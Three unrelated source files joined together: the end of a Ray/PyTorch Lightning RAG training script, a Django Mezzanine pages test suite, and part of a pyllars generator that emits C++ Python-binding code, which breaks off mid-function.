help="Path to the dataset of passages for custom index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
)
parser.add_argument(
"--index_path",
type=str,
default=None,
help="Path to the faiss index for custom index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
)
parser.add_argument(
"--distributed_retriever",
choices=["ray", "pytorch"],
type=str,
default="pytorch",
help="What implementation to use for distributed retriever? If "
"pytorch is selected, the index is loaded on training "
"worker 0, and torch.distributed is used to handle "
"communication between training worker 0, and the other "
"training workers. If ray is selected, the Ray library is "
"used to create load the index on separate processes, "
"and Ray handles the communication between the training "
"workers and the retrieval actors.",
)
parser.add_argument(
"--use_dummy_dataset",
type=bool,
default=False,
help="Whether to use the dummy version of the dataset index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
)
return parser
@staticmethod
def add_ray_specific_args(parser):
# Ray cluster address.
parser.add_argument(
"--ray-address",
default="auto",
type=str,
help="The address of the Ray cluster to connect to. If not "
"specified, Ray will attempt to automatically detect the "
"cluster. Has no effect if pytorch is used as the distributed "
"retriever.",
)
parser.add_argument(
"--num_retrieval_workers",
type=int,
default=1,
help="The number of retrieval actors to use when Ray is selected"
"for the distributed retriever. Has no effect when "
"distributed_retriever is set to pytorch.",
)
return parser
def main(args=None, model=None) -> GenerativeQAModule:
parser = argparse.ArgumentParser()
parser = pl.Trainer.add_argparse_args(parser)
parser = GenerativeQAModule.add_model_specific_args(parser, os.getcwd())
parser = GenerativeQAModule.add_retriever_specific_args(parser)
args = args or parser.parse_args()
Path(args.output_dir).mkdir(exist_ok=True)
named_actors = []
if args.distributed_retriever == "ray" and args.gpus > 1:
if not is_ray_available():
raise RuntimeError("Please install Ray to use the Ray " "distributed retriever.")
# Connect to an existing Ray cluster.
try:
ray.init(address=args.ray_address)
except (ConnectionError, ValueError):
logger.warning(
"Connection to Ray cluster failed. Make sure a Ray"
"cluster is running by either using Ray's cluster "
"launcher (`ray up`) or by manually starting Ray on "
"each node via `ray start --head` for the head node "
"and `ray start --address='<ip address>:6379'` for "
"additional nodes. See "
"https://docs.ray.io/en/master/cluster/index.html "
"for more info."
)
raise
# Create Ray actors only for rank 0.
if ("LOCAL_RANK" not in os.environ or os.environ["LOCAL_RANK"] == 0) and (
"NODE_RANK" not in os.environ or os.environ["NODE_RANK"] == 0
):
remote_cls = ray.remote(RayRetriever)
named_actors = [
remote_cls.options(name="retrieval_worker_{}".format(i)).remote()
for i in range(args.num_retrieval_workers)
]
else:
logger.info(
"Getting named actors for NODE_RANK {}, LOCAL_RANK {}".format(
os.environ["NODE_RANK"], os.environ["LOCAL_RANK"]
)
)
named_actors = [ray.get_actor("retrieval_worker_{}".format(i)) for i in range(args.num_retrieval_workers)]
args.actor_handles = named_actors
assert args.actor_handles == named_actors
if model is None:
model: GenerativeQAModule = GenerativeQAModule(args)
dataset = Path(args.data_dir).name
if (
args.logger_name == "default"
or args.fast_dev_run
or str(args.output_dir).startswith("/tmp")
or str(args.output_dir).startswith("/var")
):
training_logger = True # don't pollute wandb logs unnecessarily
elif args.logger_name == "wandb":
from pytorch_lightning.loggers import WandbLogger
project = os.environ.get("WANDB_PROJECT", dataset)
training_logger = WandbLogger(name=model.output_dir.name, project=project)
elif args.logger_name == "wandb_shared":
from pytorch_lightning.loggers import WandbLogger
training_logger = WandbLogger(name=model.output_dir.name, project=f"hf_{dataset}")
es_callback = (
get_early_stopping_callback(model.val_metric, args.early_stopping_patience)
if args.early_stopping_patience >= 0
else False
)
trainer: pl.Trainer = generic_train(
model,
args,
logging_callback=Seq2SeqLoggingCallback(),
checkpoint_callback=get_checkpoint_callback(args.output_dir, model.val_metric),
early_stopping_callback=es_callback,
logger=training_logger,
accelerator=CustomAccel() if args.gpus > 1 else None,
profiler=pl.profiler.AdvancedProfiler() if args.profile else None,
)
pickle_save(model.hparams, model.output_dir / "hparams.pkl")
if not args.do_predict:
return model
# test() without a model tests using the best checkpoint automatically
trainer.test()
return model
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser = pl.Trainer.add_argparse_args(parser)
parser = GenerativeQAModule.add_model_specific_args(parser, os.getcwd())
parser = GenerativeQAModule.add_retriever_specific_args(parser)
parser = GenerativeQAModule.add_ray_specific_args(parser)
# Pytorch Lightning Profiler
parser.add_argument(
"--profile",
action="store_true",
help="If True, use pytorch_lightning.profiler.AdvancedProfiler to profile the Trainer.",
)
args = parser.parse_args()
main(args)
| |
from __future__ import unicode_literals
from future.builtins import str
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.db import connection
from django.utils.unittest import skipUnless
from django.shortcuts import resolve_url
from django.template import Context, Template
from django.test.utils import override_settings
from django.utils.http import urlquote_plus
from django.utils.six.moves.urllib.parse import urlparse
from django.utils.translation import get_language
from mezzanine.conf import settings
from mezzanine.core.models import CONTENT_STATUS_PUBLISHED
from mezzanine.core.request import current_request
from mezzanine.pages.models import Page, RichTextPage
from mezzanine.pages.admin import PageAdminForm
from mezzanine.urls import PAGES_SLUG
from mezzanine.utils.tests import TestCase
User = get_user_model()
class PagesTests(TestCase):
@staticmethod
def reset_queries(connection):
try:
# Django 1.8+ - queries_log is a deque
connection.queries_log.clear()
except AttributeError:
connection.queries = []
def test_page_ascendants(self):
"""
Test the methods for looking up ascendants efficiently
behave as expected.
"""
# Create related pages.
primary, created = RichTextPage.objects.get_or_create(title="Primary")
secondary, created = primary.children.get_or_create(title="Secondary")
tertiary, created = secondary.children.get_or_create(title="Tertiary")
# Force a site ID to avoid the site query when measuring queries.
setattr(current_request(), "site_id", settings.SITE_ID)
# Test that get_ascendants() returns the right thing.
page = Page.objects.get(id=tertiary.id)
ascendants = page.get_ascendants()
self.assertEqual(ascendants[0].id, secondary.id)
self.assertEqual(ascendants[1].id, primary.id)
# Test ascendants are returned in order for slug, using
# a single DB query.
self.reset_queries(connection)
pages_for_slug = Page.objects.with_ascendants_for_slug(tertiary.slug)
self.assertEqual(len(connection.queries), 1)
self.assertEqual(pages_for_slug[0].id, tertiary.id)
self.assertEqual(pages_for_slug[1].id, secondary.id)
self.assertEqual(pages_for_slug[2].id, primary.id)
# Test page.get_ascendants uses the cached attribute,
# without any more queries.
self.reset_queries(connection)
ascendants = pages_for_slug[0].get_ascendants()
self.assertEqual(len(connection.queries), 0)
self.assertEqual(ascendants[0].id, secondary.id)
self.assertEqual(ascendants[1].id, primary.id)
# Use a custom slug in the page path, and test that
# Page.objects.with_ascendants_for_slug fails, but
# correctly falls back to recursive queries.
secondary.slug += "custom"
secondary.save()
pages_for_slug = Page.objects.with_ascendants_for_slug(tertiary.slug)
self.assertEqual(len(pages_for_slug[0]._ascendants), 0)
self.reset_queries(connection)
ascendants = pages_for_slug[0].get_ascendants()
self.assertEqual(len(connection.queries), 2) # 2 parent queries
self.assertEqual(pages_for_slug[0].id, tertiary.id)
self.assertEqual(ascendants[0].id, secondary.id)
self.assertEqual(ascendants[1].id, primary.id)
def test_set_parent(self):
old_parent, _ = RichTextPage.objects.get_or_create(title="Old parent")
new_parent, _ = RichTextPage.objects.get_or_create(title="New parent")
child, _ = RichTextPage.objects.get_or_create(
title="Child", slug="kid")
self.assertTrue(child.parent is None)
self.assertTrue(child.slug == "kid")
child.set_parent(old_parent)
child.save()
self.assertEqual(child.parent_id, old_parent.id)
self.assertTrue(child.slug == "old-parent/kid")
child = RichTextPage.objects.get(id=child.id)
self.assertEqual(child.parent_id, old_parent.id)
self.assertTrue(child.slug == "old-parent/kid")
child.set_parent(new_parent)
child.save()
self.assertEqual(child.parent_id, new_parent.id)
self.assertTrue(child.slug == "new-parent/kid")
child = RichTextPage.objects.get(id=child.id)
self.assertEqual(child.parent_id, new_parent.id)
self.assertTrue(child.slug == "new-parent/kid")
child.set_parent(None)
child.save()
self.assertTrue(child.parent is None)
self.assertTrue(child.slug == "kid")
child = RichTextPage.objects.get(id=child.id)
self.assertTrue(child.parent is None)
self.assertTrue(child.slug == "kid")
child = RichTextPage(title="child2")
child.set_parent(new_parent)
self.assertEqual(child.slug, "new-parent/child2")
# Assert that cycles are detected.
p1, _ = RichTextPage.objects.get_or_create(title="p1")
p2, _ = RichTextPage.objects.get_or_create(title="p2")
p2.set_parent(p1)
with self.assertRaises(AttributeError):
p1.set_parent(p1)
with self.assertRaises(AttributeError):
p1.set_parent(p2)
p2c = RichTextPage.objects.get(title="p2")
with self.assertRaises(AttributeError):
p1.set_parent(p2c)
def test_set_slug(self):
parent, _ = RichTextPage.objects.get_or_create(
title="Parent", slug="parent")
child, _ = RichTextPage.objects.get_or_create(
title="Child", slug="parent/child", parent_id=parent.id)
parent.set_slug("new-parent-slug")
self.assertTrue(parent.slug == "new-parent-slug")
parent = RichTextPage.objects.get(id=parent.id)
self.assertTrue(parent.slug == "new-parent-slug")
child = RichTextPage.objects.get(id=child.id)
self.assertTrue(child.slug == "new-parent-slug/child")
def test_login_required(self):
public, _ = RichTextPage.objects.get_or_create(
title="Public", slug="public", login_required=False)
private, _ = RichTextPage.objects.get_or_create(
title="Private", slug="private", login_required=True)
accounts_installed = ("mezzanine.accounts" in settings.INSTALLED_APPS)
args = {"for_user": AnonymousUser()}
self.assertTrue(public in RichTextPage.objects.published(**args))
self.assertTrue(private not in RichTextPage.objects.published(**args))
args = {"for_user": User.objects.get(username=self._username)}
self.assertTrue(public in RichTextPage.objects.published(**args))
self.assertTrue(private in RichTextPage.objects.published(**args))
public_url = public.get_absolute_url()
private_url = private.get_absolute_url()
self.client.logout()
response = self.client.get(private_url, follow=True)
login_prefix = ""
login_url = resolve_url(settings.LOGIN_URL)
login_next = private_url
try:
redirects_count = len(response.redirect_chain)
response_url = response.redirect_chain[-1][0]
except (AttributeError, IndexError):
redirects_count = 0
response_url = ""
if urlparse(response_url).path.startswith("/%s/" % get_language()):
# With LocaleMiddleware a language code can be added at the
# beginning of the path.
login_prefix = "/%s" % get_language()
if redirects_count > 1:
# With LocaleMiddleware and a string LOGIN_URL there can be
# a second redirect that encodes the next parameter.
login_next = urlquote_plus(login_next)
login = "%s%s?next=%s" % (login_prefix, login_url, login_next)
if accounts_installed:
# For an inaccessible page with mezzanine.accounts we should
# see a login page, without it 404 is more appropriate than an
# admin login.
target_status_code = 200
else:
target_status_code = 404
self.assertRedirects(response, login,
target_status_code=target_status_code)
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
if accounts_installed:
# View / pattern name redirect properly, without encoding next.
login = "%s%s?next=%s" % (login_prefix, login_url, private_url)
# Test if view name or URL pattern can be used as LOGIN_URL.
with override_settings(LOGIN_URL="mezzanine.accounts.views.login"):
# Note: With 1.7 this loops if the view app isn't installed.
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get(private_url, follow=True)
self.assertRedirects(response, login)
with override_settings(LOGIN_URL="login"):
# Note: The "login" is a pattern name in accounts.urls.
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get(private_url, follow=True)
self.assertRedirects(response, login)
self.client.login(username=self._username, password=self._password)
response = self.client.get(private_url, follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
if accounts_installed:
with override_settings(LOGIN_URL="mezzanine.accounts.views.login"):
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get(private_url, follow=True)
self.assertEqual(response.status_code, 200)
with override_settings(LOGIN_URL="login"):
response = self.client.get(public_url, follow=True)
self.assertEqual(response.status_code, 200)
response = self.client.get(private_url, follow=True)
self.assertEqual(response.status_code, 200)
def test_page_menu_queries(self):
"""
Test that rendering a page menu executes the same number of
queries regardless of the number of pages or levels of
children.
"""
template = ('{% load pages_tags %}'
'{% page_menu "pages/menus/tree.html" %}')
before = self.queries_used_for_template(template)
self.assertTrue(before > 0)
self.create_recursive_objects(RichTextPage, "parent", title="Page",
status=CONTENT_STATUS_PUBLISHED)
after = self.queries_used_for_template(template)
self.assertEqual(before, after)
def test_page_menu_flags(self):
"""
Test that pages only appear in the menu templates they've been
assigned to show in.
"""
menus = []
pages = []
template = "{% load pages_tags %}"
for i, label, path in settings.PAGE_MENU_TEMPLATES:
menus.append(i)
pages.append(RichTextPage.objects.create(in_menus=list(menus),
title="Page for %s" % str(label),
status=CONTENT_STATUS_PUBLISHED))
template += "{%% page_menu '%s' %%}" % path
rendered = Template(template).render(Context({}))
for page in pages:
self.assertEqual(rendered.count(page.title), len(page.in_menus))
def test_page_menu_default(self):
"""
Test that the settings-defined default value for the ``in_menus``
field is used, also checking that it doesn't get forced to text,
but that sequences are made immutable.
"""
with override_settings(
PAGE_MENU_TEMPLATES=((8, "a", "a"), (9, "b", "b"))):
with override_settings(PAGE_MENU_TEMPLATES_DEFAULT=None):
page_in_all_menus = Page.objects.create()
self.assertEqual(page_in_all_menus.in_menus, (8, 9))
with override_settings(PAGE_MENU_TEMPLATES_DEFAULT=tuple()):
page_not_in_menus = Page.objects.create()
self.assertEqual(page_not_in_menus.in_menus, tuple())
with override_settings(PAGE_MENU_TEMPLATES_DEFAULT=[9]):
page_in_a_menu = Page.objects.create()
self.assertEqual(page_in_a_menu.in_menus, (9,))
def test_overridden_page(self):
"""
Test that a page with a slug matching a non-page urlpattern
return ``True`` for its overridden property.
"""
# BLOG_SLUG is empty then urlpatterns for pages are prefixed
# with PAGE_SLUG, and generally won't be overridden. In this
# case, there aren't any overridding URLs by default, so bail
# on the test.
if PAGES_SLUG:
return
page, created = RichTextPage.objects.get_or_create(slug="edit")
self.assertTrue(page.overridden())
def test_unicode_slug_parm_to_processor_for(self):
"""
Test that passing an unicode slug to processor_for works for
python 2.x
"""
from mezzanine.pages.page_processors import processor_for
@processor_for(u'test unicode string')
def test_page_processor(request, page):
return {}
page, _ = RichTextPage.objects.get_or_create(title="test page")
self.assertEqual(test_page_processor(current_request(), page), {})
@skipUnless(settings.USE_MODELTRANSLATION and len(settings.LANGUAGES) > 1,
"modeltranslation configured for several languages required")
def test_page_slug_has_correct_lang(self):
"""
Test that slug generation is done for the default language and
not the active one.
"""
from django.utils.translation import get_language, activate
from django.utils.datastructures import SortedDict
from mezzanine.utils.urls import slugify
default_language = get_language()
code_list = SortedDict(settings.LANGUAGES)
del code_list[default_language]
title_1 = "Title firt language"
title_2 = "Title second language"
page, _ = RichTextPage.objects.get_or_create(title=title_1)
for code in code_list:
try:
activate(code)
except:
pass
else:
break
# No valid language found
page.delete()
return
page.title = title_2
page.save()
self.assertEqual(page.get_slug(), slugify(title_1))
self.assertEqual(page.title, title_2)
activate(default_language)
self.assertEqual(page.title, title_1)
page.delete()
def test_clean_slug(self):
"""
Test that PageAdminForm strips leading and trailing slashes
from slugs or returns `/`.
"""
class TestPageAdminForm(PageAdminForm):
class Meta:
fields = ["slug"]
model = Page
data = {'slug': '/'}
submitted_form = TestPageAdminForm(data=data)
self.assertTrue(submitted_form.is_valid())
self.assertEqual(submitted_form.cleaned_data['slug'], "/")
data = {'slug': '/hello/world/'}
submitted_form = TestPageAdminForm(data=data)
self.assertTrue(submitted_form.is_valid())
self.assertEqual(submitted_form.cleaned_data['slug'], 'hello/world')
| |
import os
from typing import List, Optional
from pyllars.cppparser.parser.clang_translator import NodeType
from .generator import Generator
class CXXRecordDeclGenerator(Generator):
def generate(self):
self._node.normalize()
if 'implicit' in self._node.qualifiers:
return None, None
name = self._node.name or "anonymous_%s" % self._node.node_id
typename_qualifier = "typename" if 'union' not in self._node.qualifiers else ""
def find_typename(node: NodeType.Node, recurse: bool=False):
if node is None:
return None
if self._node.name:
typename = f"{typename_qualifier} ::{self._node.full_cpp_name}"
elif not self._node.parent:
typename = None
else:
index = self._node.parent.children.index(self._node)
if index < 0:
raise Exception("invalid code structure encountered")
if len(self._node.parent.children) > index + 1 and isinstance(self._node.parent.children[index + 1],
NodeType.FieldDecl):
field = self._node.parent.children[index + 1]
field_name = field.full_cpp_name
typename = f"decltype(::{field_name})" if field.name else None
elif recurse and node.parent and not isinstance(node.parent, NodeType.NamespaceDecl):
return find_typename(node.parent, recurse)
else:
typename = None
return typename
typename = find_typename(self._node)
if not typename:
return None, None
header_stream = open(os.path.join(self.my_root_dir, name+'.hpp'), 'w',
encoding='utf-8')
body_stream = open(os.path.join(self.my_root_dir, self._source_path_root, name+'.cpp'), 'w',
encoding='utf-8')
try:
parent = self._node.parent
# generate body
body_stream.write(f"#include <pyllars/pyllars_class.hpp>\n")
body_stream.write(f"#include <{self.source_path}>\n")
if self._node.name:
body_stream.write(f"#include \"{self._node.name}.hpp\"\n\n")
body_stream.write("namespace {\n")
if isinstance(parent, NodeType.NamespaceDecl):
if parent:
body_stream.write(f"""
extern const char parent_fullnsname[] = "{parent.full_cpp_name}";
using Parent = pyllars::NSInfo<parent_fullnsname>;
""")
else:
body_stream.write("using Parent = pyllars:GlobalNS;\n")
else:
body_stream.write(f"using Parent = {find_typename(self._node.parent, True) or 'pyllars::GlobalNS'};\n")
if self._node.bases:
bases = ", " + ", ".join([c.full_name for c in self._node.bases])
else:
bases = ""
body_stream.write("}\n\n")
body_stream.write(f"template class pyllars::PyllarsClass<{typename}, Parent{bases}>;\n")
body_stream.write(f"""
namespace __pyllars_internal{{
template<>
const char* const TypeInfo<{typename}>::type_name = \"{self._node.name if self._node.name else "<<anonymous type>>"}\";
}}
""")
finally:
header_stream.close()
body_stream.close()
return header_stream.name, body_stream.name
class DefinitionDataGenerator(Generator):
def generate(self):
return None, None
class DefaultConstructorGenerator(Generator):
def generate(self):
parent = self._node.parent.parent
class_name = self._node.parent.parent.name
if not class_name:
return None, None
if 'default_is_constexpr' in self._node.classifiers:
return None, None
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_constructor.cpp'), 'w',
encoding='utf-8')
try:
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
body_stream.write("namespace {\n")
body_stream.write(" static const char* const empty_list[] = {nullptr};\n")
body_stream.write("}\n")
body_stream.write(f"template class pyllars::PyllarsClassConstructor<empty_list, "
f"{self._node.parent.parent.full_cpp_name}>;")
finally:
body_stream.close()
return None, body_stream.name
class CopyConstructorGenerator(Generator):
def generate(self):
class_name = self._node.parent.parent.name
if not class_name:
return None, None
if 'user_declared' in self._node.classifiers or not self._node.classifiers:
return None, None
class_full_cpp_name = self._node.parent.parent.full_cpp_name
parent = self._node.parent.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_copy_constructor.cpp'), 'w',
encoding='utf-8')
try:
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
body_stream.write("using namespace pyllars;\nnamespace{\n")
body_stream.write(" const char* const kwlist[] = {\"object\", nullptr};")
body_stream.write("}\n\n")
body_stream.write(f"template class PyllarsClassConstructor<kwlist, {class_full_cpp_name}, const {class_full_cpp_name}&>;")
finally:
body_stream.close()
return None, body_stream.name
class MoveConstructorGenerator(Generator):
def generate(self):
class_name = self._node.parent.parent.name
if not class_name:
return None, None
if 'user_declared' in self._node.classifiers or not self._node.classifiers:
return None, None
class_full_cpp_name = self._node.parent.parent.full_cpp_name
parent = self._node.parent.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_move_constructor.cpp'), 'w',
encoding='utf-8')
try:
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
body_stream.write("using namespace pyllars;\nnamespace{\n")
body_stream.write(" const char* const kwlist[] = {\"object\", nullptr};")
body_stream.write("}\n\n")
body_stream.write(
f"template class PyllarsClassConstructor<kwlist, {class_full_cpp_name}, const {class_full_cpp_name}&&>;")
finally:
body_stream.close()
return None, body_stream.name
class CopyAssignmentGenerator(Generator):
def generate(self):
class_name = self._node.parent.parent.name
if not class_name:
return None, None
if 'user_declared' in self._node.classifiers or not self._node.classifiers:
return None, None
class_full_cpp_name = self._node.parent.parent.full_cpp_name
parent = self._node.parent.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_copy_assignment.cpp'), 'w',
encoding='utf-8')
try:
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <cstddef>
#include <type_traits>
#include <pyllars/pyllars_classmethod.hpp>
""")
body_stream.write(f"""
using namespace pyllars;
namespace {{
//From: DefaultConstructorDeclGenerator.generate
/**
* clang does not properly delete default assignment operator, so must use compile-time check
* instead to prevent compiler error from generated code that shouldn't be
*/
template<const char* const name, const char* const kwlist[], typename T>
static int template_set_up(){{
if constexpr (std::is_copy_assignable<T>::value){{
typedef T& (T::*method_t)(const T&);
PyllarsClassMethod<name, kwlist, method_t, &T::operator= >();
}}
return 0;
}}
typedef const char* const kwlist_t[2];
constexpr kwlist_t kwlist = {{"assign_to", nullptr}};
constexpr cstring this_name = "this";
const int status = template_set_up<this_name, kwlist, {class_full_cpp_name}>();
}}
""")
finally:
body_stream.close()
return None, body_stream.name
class MoveAssignmentGenerator(Generator):
def generate(self):
class_name = self._node.parent.parent.name
if not class_name:
return None, None
if 'user_declared' in self._node.classifiers or not self._node.classifiers:
return None, None
class_full_cpp_name = self._node.parent.parent.full_cpp_name
parent = self._node.parent.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_copy_assignment.cpp'), 'w',
encoding='utf-8')
try:
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <cstddef>
#include <type_traits>
#include <pyllars/pyllars_classmethod.hpp>
""")
body_stream.write(f"""
using namespace pyllars;
namespace {{
//From: DefaultConstructorDeclGenerator.generate
/**
* clang does not properly delete default assignment operator, so must use compile-time check
* instead to prevent compiler error from generated code that shouldn't be
*/
template<const char* const name, const char* const kwlist[], typename T>
static int template_set_up(){{
if constexpr (std::is_copy_assignable<T>::value){{
typedef T& (T::*method_t)(const T&&);
PyllarsClassMethod<name, kwlist, method_t, &T::operator= >();
}}
return 0;
}}
typedef const char* const kwlist_t[2];
constexpr kwlist_t kwlist = {{"assign_to", nullptr}};
constexpr cstring this_name = "this";
const int status = template_set_up<this_name, kwlist, {class_full_cpp_name}>();
}}
""")
finally:
body_stream.close()
return None, body_stream.name
class CXXConstructorDeclGenerator(Generator):
def _scoped_type_name(self, typ):
parts = typ.strip().split(' ')
def full_name(t):
if "::" in t:
first, rest = t.split("::", maxsplit=1)
else:
first, rest = t, ""
# search upward for enclosing definition
parent = self._node
while parent:
if hasattr(parent, 'name') and parent.name == first:
return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
parent = parent.parent
# possibly an internally defined class or type:
for child in self._node.parent.children:
if hasattr(child, 'name') and child.name == t:
return '::' + child.full_cpp_name
return t
for index, typ in enumerate(parts):
if not typ in self.KEYWORDS:
parts[index] = full_name(typ)
return ' '.join(parts)
def _full_signature(self):
qualifiers = self._node.signature.rsplit(')', maxsplit=1)[-1]
params = [self._scoped_type_name(p.type_text) for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
if '...' in self._node.signature:
params.append("...")
params = ", ".join(params)
class_qualifier = f"(::{self._node.parent.full_cpp_name}::*)"
return f"{class_qualifier}({params}) {qualifiers}"
def generate(self):
class_name = self._node.parent.name
parent = self._node.parent
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + '::' + self._node.name.replace("/", " div") + self._node.signature + '.cpp'), 'w',
encoding='utf-8')
body_stream.write(f"""\n#include \"{self.source_path}\"\n\n""")
#grand_parent = parent
#while grand_parent and grand_parent.name:
# if isinstance(grand_parent, NodeType.NamespaceDecl):
# body_stream.write(f"using namespace {grand_parent.full_cpp_name};\n")
# grand_parent = grand_parent.parent
try:
#parent_name = parent.name
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classconstructor.hpp>
\n""")
name = self._node.name
signature = self._full_signature()
kwlist = []
args = []
for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
if not c.name:
break
kwlist.insert(0, f"\"{c.name}\"")
args.append(c.type_text)
args = (", " + ", ".join(args)) if args else ""
kwlist_items = ", ".join(kwlist + ["nullptr"])
body_stream.write("namespace{\n")
body_stream.write(f" static const char* const kwlist[] = {{{kwlist_items}}};\n")
body_stream.write(f" constexpr cstring name = \"{name}\";\n")
body_stream.write("}\n\n")
body_stream.write(f"template class pyllars::PyllarsClassConstructor<kwlist, {self._node.parent.full_cpp_name} {args}>;")
finally:
body_stream.close()
return None, body_stream.name
class CXXMethodDeclGenerator(Generator):
def _scoped_type_name(self, typ):
parts = typ.strip().split(' ')
def full_name(t):
if "::" in t:
first, rest = t.split("::", maxsplit=1)
else:
first, rest = t, ""
# search upward for enclosing definition
parent = self._node
while parent:
if hasattr(parent, 'name') and parent.name == first:
return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
parent = parent.parent
# possibly an internally defined class or type:
for child in self._node.parent.children:
if hasattr(child, 'name') and child.name == t:
return '::' + child.full_cpp_name
return t
for index, typ in enumerate(parts):
if not typ in self.KEYWORDS:
parts[index] = full_name(typ)
return ' '.join(parts)
def _full_signature(self):
is_static = 'static' in self._node.qualifiers
ret_type = self._scoped_type_name(self._node.signature.split('(')[0])
qualifiers = self._node.signature.rsplit(')', maxsplit=1)[-1]
params = [self._scoped_type_name(p.type_text) for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
if '...' in self._node.signature:
params.append("...")
params = ", ".join(params)
class_qualifier = f"(::{self._node.parent.full_cpp_name}::*)" if not is_static else "(*)"
return f"{ret_type} {class_qualifier}({params}) {qualifiers}"
def generate(self):
class_name = self._node.parent.name
parent = self._node.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, class_name + '::' + self._node.name.replace("/", " div") + self._node.signature + '.cpp'), 'w',
encoding='utf-8')
body_stream.write(f"""\n#include \"{self.source_path}\"\n\n""")
grand_parent = parent
while grand_parent and grand_parent.name:
if isinstance(grand_parent, NodeType.NamespaceDecl):
body_stream.write(f"using namespace {grand_parent.full_cpp_name};\n")
grand_parent = grand_parent.parent
if self._node.name == "operator=":
return self.generate_assignment(body_stream)
if self._node.name.startswith("operator"):
return self.generate_operator(body_stream)
try:
parent_name = parent.name
# generate body
if 'static' in self._node.qualifiers:
method_qualifier = "Static"
class_param = f"{self._node.parent.full_cpp_name}, "
body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classstaticmethod.hpp>
""")
else:
method_qualifier = ""
class_param = ""
body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classmethod.hpp>
\n""")
name = self._node.name
signature = self._full_signature()
kwlist = []
for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
if not c.name:
break
kwlist.insert(0, f"\"{c.name}\"")
kwlist_items = ", ".join(kwlist + ["nullptr"])
body_stream.write("namespace{\n")
body_stream.write(f" static const char* const kwlist[] = {{{kwlist_items}}};\n")
body_stream.write(f" constexpr cstring name = \"{name}\";\n")
body_stream.write("}\n\n")
body_stream.write(f"template class pyllars::PyllarsClass{method_qualifier}Method<name, kwlist, {class_param}{signature}, &{self._node.full_cpp_name}>;")
finally:
body_stream.close()
return None, body_stream.name
def generate_assignment(self, body_stream):
if 'default_delete' in self._node.qualifiers:
return None, None
class_name = self._node.parent.name
class_full_cpp_name = self._node.parent.full_cpp_name
try:
parent = self._node.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>
#include <pyllars/pyllars_classmethod.hpp>
""")
name = "this"
signature = self._full_signature()
kwlist = []
for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
if not c.name:
break
kwlist.insert(0, f"\"{c.name}\"")
if len(kwlist) == 1:
kwlist = ["assign_to"]
kwlist_items = ", ".join(kwlist + ["nullptr"])
body_stream.write("namespace{\n")
body_stream.write(f" static const char* const kwlist[] = {{{kwlist_items}}};\n")
body_stream.write(f" constexpr cstring name = \"{name}\";\n")
body_stream.write("}\n\n")
body_stream.write(f"template class pyllars::PyllarsClassMethod<name, kwlist, {signature}, &::{class_full_cpp_name}::operator= >;")
finally:
body_stream.close()
return None, body_stream.name
def generate_operator(self, body_stream):
unary_mapping = {
'~' : 'pyllars::OpUnaryEnum::INV',
'+' : 'pyllars::OpUnaryEnum::POS',
